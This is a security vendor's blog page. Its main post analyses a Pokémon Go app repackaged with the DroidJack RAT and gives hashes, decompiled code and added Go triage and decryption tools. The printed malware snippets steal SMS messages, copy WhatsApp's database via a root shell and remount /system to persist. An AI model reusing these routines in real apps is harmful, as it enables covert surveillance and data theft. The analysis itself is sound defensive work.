Google Offers $200,000 to Find Android Vulnerabilities

"Show me the money" might become the new motto of the hacking world, and with good reason. Google has announced that it will offer up to $200,000 in prize money to the first team that can find a bug chain giving remote access to multiple Android devices when the attacker knows only their email addresses or phone numbers.

Announced by Google's Project Zero research team, the contest began on 9/14/2016 and is scheduled to run through next March 14. Researchers are invited to find critical bugs in Android, specifically on Nexus 6P and Nexus 5X devices running builds that are current for the specific device.

This offer is largely a response to the widespread Android vulnerability discovered in August 2016, named QuadRooter, which affected 900 million devices.

Google is banking on the prize amount motivating hackers to find flaws in the ecosystem. The first prize in the competition is $200,000, the second prize is $100,000 and the third prize is $50,000. There will be additional awards for winning entries that find flaws in Google's operating system.

Trustlook Mobile Security SDK Whitepaper Now Available

The Trustlook Mobile Security SDK is a robust, feature-packed, multi-layered security framework for building mobile security apps. Learn how you can use the SDK to build your security app with the newly released whitepaper. See how GO Security used Trustlook's SDK to build one of the most popular security apps in the Google Play store.

Download here:
http://www.trustlook.com/sdk_whitepaper/

Pokémon Go Bundled with Malicious Remote Administration Tool DroidJack

Because of the expanding popularity of Pokémon Go, the app has attracted more attention from hackers than ever: the popular game can help them spread their malicious apps more efficiently. Trustlook recently discovered a Pokémon Go app repackaged with the DroidJack Remote Administration Tool (RAT). The app looks like a normal game but can actually be used to control the user's device. The repackaged Trojan can be identified by the following characteristics:

  • MD5: d350cc8222792097317608ea95b283a8
  • SHA256: 15db22fd7d961f4d4bd96052024d353b3ff4bd135835d2644d94d74c925af3c4
  • Size: 184036 bytes
  • App name: 61029052
  • Package name: com.nianticlabs.pokemongo

The app is identical to the normal Pokémon Go app when it is running:

[screenshots of the repackaged app running]

The app is signed with the following certificate, which does not belong to the Pokémon Go game developer:

[screenshot of the signing certificate]

In the following image of the code structure, the package "net.droidjack.server" can be seen:

[screenshot of the decompiled package structure showing net.droidjack.server]

The DroidJack RAT tool can perform the following malicious activities:

  • Get SMS Messages
  • Monitor/record calls
  • Get call logs
  • Browser bookmarks/history
  • WhatsApp Call Logs
  • GPS location
  • WhatsApp Chat
  • Record sound
  • Capture video
  • Take picture
  • Send device information
  • Install files to the system folder
  • Update itself

The following code snippets are responsible for collecting SMS messages:

protected void a()
{
  ag localag = new ag(this.c);
  localag.b();
  // sent messages are read through the SMS content provider
  Object localObject = Uri.parse("content://sms/sent");
  Cursor localCursor = this.c.getContentResolver().query((Uri)localObject, null, null, null, null);
  if (localCursor.getCount() > 0) {}
  for (;;)
  {
    if (!localCursor.moveToNext()) {
      return;
    }
    String str3 = localCursor.getString(localCursor.getColumnIndex("body"));     // message text
    String str1 = localCursor.getString(localCursor.getColumnIndex("address"));  // phone number
    String str4 = localCursor.getString(localCursor.getColumnIndex("date"));
    String str2 = a(str1);
    localObject = str2;
[…]

protected void b()
{
  ag localag = new ag(this.c);
  localag.a();
  // received messages are read the same way from the inbox
  Object localObject = Uri.parse("content://sms/inbox");
  Cursor localCursor = this.c.getContentResolver().query((Uri)localObject, null, null, null, null);
  if (localCursor.getCount() > 0) {}
  for (;;)
  {
    if (!localCursor.moveToNext()) {
      return;
    }
    String str3 = localCursor.getString(localCursor.getColumnIndex("body"));     // message text
    String str1 = localCursor.getString(localCursor.getColumnIndex("address"));  // phone number
    String str2 = a(str1);   // lookup on the number; the raw number is used when it returns null
    localObject = str2;
    if (str2 == null) {
      localObject = str1;
    }
    localag.a(str1, (String)localObject, str3, localCursor.getString(localCursor.getColumnIndex("date")));
  }
}

The following code snippets are used to retrieve WhatsApp logs:


protected byte[] a()
{
  try
  {
    this.d = new File(Environment.getExternalStorageDirectory() + "/WhatsApp/Databases/wams.db");
    // commands are written, newline-terminated, into a root ("su") shell:
    // WhatsApp's private message database is copied out to external storage
    Object localObject = new DataOutputStream(Runtime.getRuntime().exec("su").getOutputStream());
    ((DataOutputStream)localObject).writeBytes("cp data/data/com.whatsapp/databases/msgstore.db " + this.d.getAbsolutePath());
    ((DataOutputStream)localObject).writeBytes("\nexit");
    Thread.sleep(10000L);
    if (this.d.exists()) {}
    return "NoWA".getBytes();
  }

The following code snippets are used to install files to the system folder:

public class FBDBSender

protected byte[] c()
{
  try
  {
    // path of this app's own APK (128 = PackageManager.GET_META_DATA)
    Object localObject = new File(this.a.getPackageManager().getApplicationInfo(this.a.getPackageName(), 128).sourceDir);
    DataOutputStream localDataOutputStream = new DataOutputStream(Runtime.getRuntime().exec("su").getOutputStream());
    // remount /system read-write, copy the APK into /system/app, remount read-only
    localDataOutputStream.writeBytes("mount -o remount,rw -t yaffs2 /dev/block/mtdblock3 /system\n");
    localDataOutputStream.writeBytes("cp -rp " + ((File)localObject).getAbsolutePath() + " /system/app/" + ((File)localObject).getName());
    localDataOutputStream.writeBytes("\nmount -o remount,ro -t yaffs2 /dev/block/mtdblock3 /system");
    localDataOutputStream.writeBytes("\nexit");
    Thread.sleep(10000L);
    localObject = "Ack".getBytes();
    return localObject;
  }
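
The indicators in this post (the sample hashes, the net.droidjack.server package, and the content URIs, paths and shell commands visible in the decompiled snippets) can be folded into a small triage check. The Go program below is an added example, not Trustlook's code: it treats the APK as the zip archive it is, compares its MD5/SHA-256 with the published values, and scans every .dex entry for the marker strings. The dex type-descriptor form of the package (Lnet/droidjack/server/) is an assumption about how the name appears on disk, and the sample "APK" it builds is a constructed zip holding a fake classes.dex, not a real package.

```go
package main

import (
	"archive/zip"
	"bytes"
	"crypto/md5"
	"crypto/sha256"
	"encoding/hex"
	"fmt"
	"io"
	"strings"
)

// Indicators quoted from the write-up above.
const (
	iocMD5    = "d350cc8222792097317608ea95b283a8"
	iocSHA256 = "15db22fd7d961f4d4bd96052024d353b3ff4bd135835d2644d94d74c925af3c4"
)

// Strings to look for inside classes.dex: the RAT package as a dex type
// descriptor (assumed form), then the content URIs, paths and shell commands
// seen in the decompiled snippets.
var suspiciousMarkers = []string{
	"Lnet/droidjack/server/",
	"content://sms/inbox",
	"content://sms/sent",
	"/WhatsApp/Databases/",
	"mount -o remount,rw",
}

// Finding is the outcome of triaging one APK.
type Finding struct {
	MD5, SHA256 string
	HashMatch   bool     // file hash equals a published IoC
	Markers     []string // suspicious strings found in .dex entries
}

// Verdict turns the findings into a one-line classification.
func (f Finding) Verdict() string {
	switch {
	case f.HashMatch:
		return "known-bad: hash matches the published DroidJack sample"
	case len(f.Markers) > 0:
		return "suspicious: " + strings.Join(f.Markers, ", ")
	default:
		return "no indicators found"
	}
}

// triageAPK hashes the file and scans every .dex entry for the markers.
// An APK is a zip archive, so archive/zip is enough to reach classes.dex.
func triageAPK(apk []byte) (Finding, error) {
	m, s := md5.Sum(apk), sha256.Sum256(apk)
	f := Finding{MD5: hex.EncodeToString(m[:]), SHA256: hex.EncodeToString(s[:])}
	f.HashMatch = f.MD5 == iocMD5 || f.SHA256 == iocSHA256

	zr, err := zip.NewReader(bytes.NewReader(apk), int64(len(apk)))
	if err != nil {
		return f, fmt.Errorf("not a zip/APK: %w", err)
	}
	found := map[string]bool{}
	for _, entry := range zr.File {
		if !strings.HasSuffix(entry.Name, ".dex") {
			continue
		}
		rc, err := entry.Open()
		if err != nil {
			return f, err
		}
		dex, err := io.ReadAll(rc)
		rc.Close()
		if err != nil {
			return f, err
		}
		for _, marker := range suspiciousMarkers {
			if !found[marker] && bytes.Contains(dex, []byte(marker)) {
				found[marker] = true
				f.Markers = append(f.Markers, marker)
			}
		}
	}
	return f, nil
}

// buildSampleAPK constructs a minimal zip whose only entry is a fake
// classes.dex holding the given text; it stands in for a real APK here.
func buildSampleAPK(dexContent string) []byte {
	var buf bytes.Buffer
	zw := zip.NewWriter(&buf)
	w, _ := zw.Create("classes.dex")
	_, _ = w.Write([]byte(dexContent))
	_ = zw.Close()
	return buf.Bytes()
}

func main() {
	samples := []string{
		"Lcom/nianticlabs/pokemongo/MainActivity; Lnet/droidjack/server/Main; content://sms/inbox",
		"Lcom/example/game/MainActivity;",
	}
	for _, dex := range samples {
		f, err := triageAPK(buildSampleAPK(dex))
		if err != nil {
			fmt.Println("error:", err)
			continue
		}
		fmt.Printf("sha256=%s\n  %s\n", f.SHA256, f.Verdict())
	}
}
```

A hash match only catches this exact file; the marker scan is what catches the next repackaging of the same RAT, which is why the verdict reports both.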


The malware may encrypt the collected data with AES, using a key hard-coded in the class below, before sending it out:

public class aj
{
  // 16-byte AES key hard-coded in the sample; as ASCII the bytes read "LRSANJUISTHERAJA"
  private static final byte[] a = { 76, 82, 83, 65, 78, 74, 85, 73, 83, 84, 72, 69, 82, 65, 74, 65 };

  public static String a(String paramString)
  {
    Key localKey = a();
    Cipher localCipher = Cipher.getInstance("AES");   // "AES" alone defaults to AES/ECB/PKCS5Padding on Android
    localCipher.init(1, localKey);                     // 1 = Cipher.ENCRYPT_MODE
    return Base64.encodeToString(localCipher.doFinal(paramString.getBytes()), 0);   // 0 = Base64.DEFAULT
  }

  private static Key a()
  {
    return new SecretKeySpec(a, "AES");
  }

  public static String b(String paramString)
  {
    Key localKey = a();
    Cipher localCipher = Cipher.getInstance("AES");
    localCipher.init(2, localKey);                     // 2 = Cipher.DECRYPT_MODE
    return new String(localCipher.doFinal(Base64.decode(paramString, 0)));
  }
}
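
Because the key is static and the mode is ECB, anything this class encrypts can be recovered by an analyst who has the sample, which matters when reconstructing what was exfiltrated from a captured device or network trace. The following Go program is an added example, not code from the malware or from Trustlook: decryptDroidJack reverses aj.b() (Base64 decode, AES-ECB with the hard-coded key, PKCS#5 unpadding), and duplicateBlocks shows the other weakness of the scheme, that equal plaintext blocks produce equal ciphertext blocks. encryptDroidJack mirrors aj.a() only to build fixtures; the record format in main is constructed for the example, not the malware's real format.

```go
package main

import (
	"crypto/aes"
	"encoding/base64"
	"errors"
	"fmt"
)

// The 16-byte key hard-coded in class aj above (ASCII "LRSANJUISTHERAJA").
var droidjackKey = []byte{76, 82, 83, 65, 78, 74, 85, 73, 83, 84, 72, 69, 82, 65, 74, 65}

// pkcs5Pad/pkcs5Unpad implement the padding that Cipher.getInstance("AES")
// applies by default on Android (AES/ECB/PKCS5Padding).
func pkcs5Pad(b []byte) []byte {
	n := aes.BlockSize - len(b)%aes.BlockSize
	out := make([]byte, len(b)+n)
	copy(out, b)
	for i := len(b); i < len(out); i++ {
		out[i] = byte(n)
	}
	return out
}

func pkcs5Unpad(b []byte) ([]byte, error) {
	if len(b) == 0 {
		return nil, errors.New("empty plaintext")
	}
	n := int(b[len(b)-1])
	if n == 0 || n > aes.BlockSize || n > len(b) {
		return nil, errors.New("bad padding")
	}
	for _, p := range b[len(b)-n:] {
		if int(p) != n {
			return nil, errors.New("bad padding")
		}
	}
	return b[:len(b)-n], nil
}

// ecb applies the block cipher to each 16-byte block independently. Go's
// standard library deliberately has no ECB helper, so it is spelled out here.
func ecb(apply func(dst, src []byte), data []byte) []byte {
	out := make([]byte, len(data))
	for i := 0; i < len(data); i += aes.BlockSize {
		apply(out[i:i+aes.BlockSize], data[i:i+aes.BlockSize])
	}
	return out
}

// decryptDroidJack reverses aj.b(). Android's Base64.DEFAULT wraps output at
// 76 columns; Go's decoder ignores the newlines, so wrapped input is fine.
func decryptDroidJack(b64 string) (string, error) {
	ct, err := base64.StdEncoding.DecodeString(b64)
	if err != nil {
		return "", err
	}
	if len(ct) == 0 || len(ct)%aes.BlockSize != 0 {
		return "", errors.New("ciphertext is not a whole number of AES blocks")
	}
	block, err := aes.NewCipher(droidjackKey)
	if err != nil {
		return "", err
	}
	pt, err := pkcs5Unpad(ecb(block.Decrypt, ct))
	if err != nil {
		return "", err
	}
	return string(pt), nil
}

// encryptDroidJack mirrors aj.a(); it exists only to build fixtures here.
func encryptDroidJack(pt string) string {
	block, _ := aes.NewCipher(droidjackKey) // 16-byte key, cannot fail
	return base64.StdEncoding.EncodeToString(ecb(block.Encrypt, pkcs5Pad([]byte(pt))))
}

// duplicateBlocks counts ciphertext blocks that repeat an earlier block. Under
// ECB with a fixed key, equal plaintext blocks give equal ciphertext blocks,
// so the scheme leaks structure even to someone without the key.
func duplicateBlocks(b64 string) int {
	ct, err := base64.StdEncoding.DecodeString(b64)
	if err != nil {
		return 0
	}
	seen := map[string]bool{}
	dups := 0
	for i := 0; i+aes.BlockSize <= len(ct); i += aes.BlockSize {
		k := string(ct[i : i+aes.BlockSize])
		if seen[k] {
			dups++
		}
		seen[k] = true
	}
	return dups
}

func main() {
	// Constructed stand-in for a stolen SMS record as it would enter aj.a().
	sample := encryptDroidJack("+15551234567|2016-09-01 10:15|meet at noon")
	pt, err := decryptDroidJack(sample)
	fmt.Printf("ciphertext: %s\nrecovered:  %q err=%v\n", sample, pt, err)
	fmt.Println("repeated blocks in a repeating 32-byte plaintext:",
		duplicateBlocks(encryptDroidJack("0123456789abcdef0123456789abcdef")))
}
```

The padding and block-length checks matter in practice: captured traffic is often truncated, and a decoder that panics on a short buffer is useless in an incident-response pipeline.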

   

Summary

Installing apps from third-party sources may expose your device to potential threats. Downloading from a trusted source is one way to keep devices secure. Installing a security app such as Trustlook Mobile Security & Antivirus also helps to prevent identity theft and safeguard you online.

Trustlook Sentinel Whitepaper Now Available!

Are you interested in learning more about one of the most groundbreaking technologies in mobile security?

Trustlook Sentinel is the first ever 100% behavior-based malware detection engine built into the operating system of a mobile device. It provides real-time zero-day detection of malware. Download the whitepaper here and discover why Sentinel is considered a game changer in security.

Trustlook Mobile Security Releases Instant Protection Feature

Trustlook has released a new feature in its Trustlook Mobile Security app that proactively notifies users of any new malware on their device. Instead of a user needing to re-scan their device in order to find malware, Trustlook will send a message to users if it discovers malware that was previously unknown.

For example:

  1. Jack installs a new app.
  2. Trustlook Mobile Security's protection is triggered and the app is uploaded to Trustlook's cloud. In a small number of cases Trustlook's system has no prior knowledge of the app, so we consider it benign.
  3. A few days later, Trustlook's Core Security system detects this new app as malware.
  4. Trustlook Operations launches "Instant Protection" to notify Jack of this malware and to uninstall the app.

In a perfect world, mobile devices would be 100% protected from security risks because security vendors would be aware of every malicious application that exists. However, that is not reality: full, 100% coverage is not possible. To mitigate these security risks, Trustlook now offers Instant Protection.

Oops! BadKernel Now Affects 100 Million, Not 30 Million

We reported last week that BadKernel, a flaw in the Google Chromium mobile browser framework that spreads as users click on malicious links, affects 30 million Android users. However, from our internal reporting over the past few days, it’s clear that the actual number is much higher. Our new estimate is that BadKernel now impacts 100 million Android users. This is about 7% of the total Android user base.

Trustlook has released a new feature in its Trustlook Mobile Security app that detects BadKernel. You are encouraged to scan your phone today and see if you are impacted.

Trustlook Releases BadKernel Vulnerability Detector

An Updated Version (Version 3.5.10) of the Trustlook Mobile Security App Identifies the BadKernel Issue Affecting 30 Million Android Users

Trustlook has released a new feature in its Trustlook Mobile Security app that detects BadKernel, the widespread vulnerability affecting millions of Android devices.

First discovered in August 2016, BadKernel is a flaw in the Google Chromium mobile browser framework that spreads as users click on malicious links. Users of older versions of Chromium-powered mobile browsers, as well as applications with embedded Webview (such as the massively popular WeChat app) may be vulnerable. If infected, a user’s contacts and text messages could be exposed, as well as any payment passwords.

To determine if your device is vulnerable to this threat, open the Trustlook Mobile Security app, navigate to the BadKernel Vulnerability detector on the main screen, and click “Check it Now.” If you are exposed, you can update your browser software.

[screenshots of the BadKernel Vulnerability detector in the Trustlook Mobile Security app]

The BadKernel vulnerability impacts an estimated 30 million Android smartphones and tablets. The flaw involves a bug in the source code of Google’s V8 JavaScript Engine, which is a component of the open-source Chromium. An attacker can exploit this flaw to cause key object information leakage.

Since many phones are not running the most current browser software, this zero-day attack could be used widely. Trustlook encourages users to run a quick scan of their phone and update their browser if they are affected. In addition, Trustlook suggests that users not click on random or suspicious-looking links, keep their apps and OS updated, and continually monitor their device for any potential issues.

To check if your Android device is affected by the BadKernel vulnerability, please download the Trustlook Mobile Security app.